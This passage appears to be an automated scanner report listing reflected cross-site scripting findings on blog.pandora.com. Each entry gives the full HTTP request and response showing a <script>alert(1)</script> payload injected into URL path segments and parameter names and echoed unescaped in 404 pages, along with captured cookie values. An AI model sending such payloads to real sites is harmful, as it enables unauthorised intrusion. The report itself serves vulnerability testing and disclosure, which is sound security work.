User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 355

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/washington-dca128f<script>alert(1)</script>9b5600a0222/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4fa26<script>alert(1)</script>ccd92788417 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4fa26<script>alert(1)</script>ccd92788417/archives/washington/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4fa26<script>alert(1)</script>ccd92788417/archives/washington/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb0a1<script>alert(1)</script>2021562e58c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbb0a1<script>alert(1)</script>2021562e58c/washington/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbb0a1<script>alert(1)</script>2021562e58c/washington/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2316c<script>alert(1)</script>13ece1ff165 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/washington2316c<script>alert(1)</script>13ece1ff165/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/washington2316c<script>alert(1)</script>13ece1ff165/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da3b3<script>alert(1)</script>63dacbe980f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorada3b3<script>alert(1)</script>63dacbe980f/assets_c/2010/11/North HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorada3b3<script>alert(1)</script>63dacbe980f/assets_c/2010/11/North was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3aeff<script>alert(1)</script>0e35543ed97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c3aeff<script>alert(1)</script>0e35543ed97/2010/11/North HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:38 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c3aeff<script>alert(1)</script>0e35543ed97/2010/11/North was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9922b<script>alert(1)</script>9d05ca919c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/20109922b<script>alert(1)</script>9d05ca919c3/11/North HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/20109922b<script>alert(1)</script>9d05ca919c3/11/North was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7cce4<script>alert(1)</script>41d4a417f15 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/117cce4<script>alert(1)</script>41d4a417f15/North HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/117cce4<script>alert(1)</script>41d4a417f15/North was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b0096<script>alert(1)</script>86b16cd0066 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/Northb0096<script>alert(1)</script>86b16cd0066 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/11/Northb0096<script>alert(1)</script>86b16cd0066 was not found on this server.</p>
...[SNIP]...
1.428. http://blog.pandora.com/pandora/assets_c/2010/11/North [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.pandora.com
Path:
/pandora/assets_c/2010/11/North
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload def5f<script>alert(1)</script>cbc7e5829ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/North?def5f<script>alert(1)</script>cbc7e5829ba=1 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 357

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/11/North?def5f<script>alert(1)</script>cbc7e5829ba=1 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75284<script>alert(1)</script>22efa64e34f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora75284<script>alert(1)</script>22efa64e34f/assets_c/2010/11/sd HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora75284<script>alert(1)</script>22efa64e34f/assets_c/2010/11/sd was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e532<script>alert(1)</script>7e0d5f16878 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c1e532<script>alert(1)</script>7e0d5f16878/2010/11/sd HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c1e532<script>alert(1)</script>7e0d5f16878/2010/11/sd was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1697<script>alert(1)</script>1beb0083bf8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010b1697<script>alert(1)</script>1beb0083bf8/11/sd HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010b1697<script>alert(1)</script>1beb0083bf8/11/sd was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2be7b<script>alert(1)</script>5fa8c585472 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/112be7b<script>alert(1)</script>5fa8c585472/sd HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/112be7b<script>alert(1)</script>5fa8c585472/sd was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ad328<script>alert(1)</script>2f7a6237729 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/sdad328<script>alert(1)</script>2f7a6237729 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/11/sdad328<script>alert(1)</script>2f7a6237729 was not found on this server.</p>
...[SNIP]...
1.434. http://blog.pandora.com/pandora/assets_c/2010/11/sd [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.pandora.com
Path:
/pandora/assets_c/2010/11/sd
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a53ff<script>alert(1)</script>c919746079d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/sd?a53ff<script>alert(1)</script>c919746079d=1 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/11/sd?a53ff<script>alert(1)</script>c919746079d=1 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1c19<script>alert(1)</script>6a443b18f71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorac1c19<script>alert(1)</script>6a443b18f71/index.xml HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 341

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorac1c19<script>alert(1)</script>6a443b18f71/index.xml was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d1051<script>alert(1)</script>6df0b546c02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/index.xmld1051<script>alert(1)</script>6df0b546c02 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 341

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/index.xmld1051<script>alert(1)</script>6df0b546c02 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b6f7<script>alert(1)</script>7fd9127d43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2b6f7<script>alert(1)</script>7fd9127d43b/jquery.dimension.js HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2b6f7<script>alert(1)</script>7fd9127d43b/jquery.dimension.js was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d65d<script>alert(1)</script>64c6f95a91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
